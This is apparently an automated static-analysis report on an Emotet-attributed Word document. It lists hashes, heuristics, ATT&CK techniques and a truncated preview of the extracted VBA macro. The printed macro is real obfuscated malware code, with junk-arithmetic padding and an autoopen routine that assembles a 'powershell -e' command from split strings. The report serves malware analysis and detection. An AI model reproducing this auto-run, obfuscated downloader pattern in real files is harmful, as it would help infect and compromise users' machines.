Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 c177de169b84382b…

MALICIOUS

Office (OLE)

196.8 KB Created: 2019-03-13 14:14:00 Authoring application: Microsoft Office Word First seen: 2019-04-17
MD5: 39371d725db8fd73f95db33bc73119c5 SHA-1: 0067a40999cd9a9666e89d18df3ed1f15b91d408 SHA-256: c177de169b84382b1809efd361d8e5a6ee6eff262f479724856686d03c6bb6db
282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro that uses obfuscation techniques, including splitting keywords like 'Win32_Process'. The presence of an 'autoopen' macro and the ClamAV detection strongly suggest Emotet, a known downloader family. The macro's likely intent is to download and execute a second-stage payload, as indicated by the 'GetObject' call and the general behavior of Emotet.

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-7155084-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7155084-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 39800 bytes
SHA-256: afbf31f61c7464d4b694cfa32a39e87acf8edd771a3354fa5507165a51540a17
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "EowcAc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function FUA_AUAA()
   If w1BckDX1 = vB4QDcBU Then
wDACAZ = Chr(JAAxACDG)
MBAB1AD = lAABBwA + ChrW(hABAAUD) * 14394160 * CBool(238273014) + 901428152 / Round(jUAA_AQk) - s_AU_AAo + Sqr(790214161) - 708660653 * CByte(959521343)
IG4AwA = Chr(JAAAC1A)
End If
   If jD_AZk = dUAAQAX4 Then
j1xAxA = Chr(fkQACX)
jwGAQAx = t_QGAU + ChrW(ZG1XZDU) * 371501793 * CBool(390859086) + 503960022 / Round(n_A4AkcC) - S1Bxk4 + Sqr(834751436) - 422879251 * CByte(338051091)
I_QxAX = Chr(tDAQwD)
End If
   If TQUUQ_ = WZADkUA Then
oBB1DA = Chr(GCAU1A4)
YoAAQD = hUokcw + ChrW(mQUQB1A) * 815722094 * CBool(292557748) + 667875630 / Round(wAAAAk) - QZcZUxAA + Sqr(4742612) - 295449324 * CByte(119020016)
RQQwcXX = Chr(bkBAAZQ_)
End If
   If tcQwGZ = NC41cXwD Then
fAXUAQQx = Chr(s1U4_C)
wDQZUAo = G4QwUGZU + ChrW(JUQGGA) * 482907701 * CBool(981329458) + 970306336 / Round(rAUGkA) - B1AQAA + Sqr(411024489) - 777559686 * CByte(982052654)
tAGoBBX = Chr(iAAAAU1B)
End If
   If wBZ4BDAB = WADAXX Then
zBUAcQA = Chr(O_AQ4A)
jQxA_BA = aAACok + ChrW(z_XAoCA) * 152249426 * CBool(779830433) + 464704108 / Round(jBZ_cZA) - YxDXUxAc + Sqr(369711988) - 411990199 * CByte(349145057)
f_UGAA = Chr(kDAZBGQ)
End If
   If VkA4AX = H1AoAAB Then
O_141CA_ = Chr(OoGAAAxZ)
RBAAUwA = RkUXAU + ChrW(jkABACw) * 30559214 * CBool(491351503) + 469170855 / Round(Eow1AA) - BoDQ_A + Sqr(982181091) - 845004648 * CByte(883962512)
L1kDDD4X = Chr(MXAAAC)
End If
End Function
Sub autoopen()
On Error Resume Next
   If dcABZxAA = OAD1B4G Then
NDBACA = Chr(WAQAQG)
AcoQww4A = jCkkAQkC + ChrW(AAQBZAU) * 195104790 * CBool(808912127) + 682828477 / Round(IABAQkC) - hDCAADAA + Sqr(765448541) - 766538163 * CByte(849285699)
wBXAAUB = Chr(CZ1QQA)
End If
   If w_A4AA = HAcAAAQD Then
OkAZoUQ_ = Chr(LAoBwQA)
CAGc1AwA = zD_XGCwA + ChrW(VAAAAQx) * 568713067 * CBool(148733705) + 92208061 / Round(UAAA4kk) - iBGCZACX + Sqr(874021784) - 27482444 * CByte(701678321)
VA_QAQAA = Chr(E4UXAQ)
End If
   If r4Dww4 = OQ4UDAA Then
KBAZBG = Chr(VAAcUkQB)
oAAAADoA = i1wAAA + ChrW(oQACAUAB) * 497569453 * CBool(487017100) + 584916142 / Round(tCAQXQAU) - LABXkQw + Sqr(336995115) - 562228471 * CByte(90695964)
jZBAAA = Chr(VABAQDB)
End If
T_ADZ1 (UoBAGXAx + "po" + OAxcBBG + "wersh" + w4AAAA + "ell -e " + qZ_DCQ + dGAZCxcA + f1AkDQB + TBZDAUAA + hAGGGk + bXDUQA + oooQQ1AA + tAAAUDAB + scAcAA)
   If CwAABDBA = FQAAQXk Then
jX1CC4B = Chr(iQAACA)
z4x_BUD = lQBQAUAZ + ChrW(mAoXAGAQ) * 292917880 * CBool(695503559) + 448936726 / Round(I1wQAxkA) - DoAoUQAA + Sqr(151885380) - 670767308 * CByte(122810268)
FUAAkA = Chr(VoUUZGA)
End If
   If HXAAZQB = z1QD_ZQU Then
jAQA__ = Chr(LoAAAcD)
EA1xAAA = kCAA1B + ChrW(nBD1UGAA) * 621096684 * CBool(44976059) + 425353829 / Round(ocBoUQXx) - jAAAABc4 + Sqr(679603693) - 669239633 * CByte(557953984)
cDUZUcA = Chr(KACcDD4A)
End If
End Sub
Function sQ4AAw()
   If WAG1AABZ = VZAQcA Then
XA4CAADU = Chr(WoQDCAUQ)
d1UUAUAC = fAABAQ + ChrW(zUAD4QA) * 683541550 * CBool(481473103) + 60583324 / Round(TXGUAA) - AwAAcAXA + Sqr(444545254) - 690255336 * CByte(911852796)
vAQAXGAA = Chr(dU4AA4AQ)
End If
   If LAAAB_A = IoBBDQ Then
QZZAoDA = Chr(IkAAAc)
dZDQAc = ak1D1kAA + ChrW(hUAAAAA4) * 282435472 * CBool(674829054) + 325355978 / Round(vB4QAXA) - lcDAAQC + Sqr(57171376) - 509106823 * CByte(703728922)
RAAwwQAU = Chr(icUDAU)
End If
   If kwX1wZB = KBwG_D1 Then
cQADBx_ = Chr(tAUGZ4)
mXkADw = Y4AcA_ + ChrW(AQABAAA) * 827943608 * CBool(934580053) + 398760272 / Round(iQDAQwA) - c_QAAkAA + Sqr(308677029) - 758141730 * CByte(413454705)
hUB14D = Chr(wGQAZC)
End If
   If XU_cCBAB = kDAAAA1 Then
aQAAQoD = Chr(lAQAAU41)
S_AAZoQA = pokGCZC1 + ChrW(EoA_kAAQ) * 618090055 * CBool(346166531) + 702292105 / Round(WAoD4GAw) - wDB4kXwA + Sqr(330065582) - 234008707 * CByte(398849381)
PCA4AxQ =
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.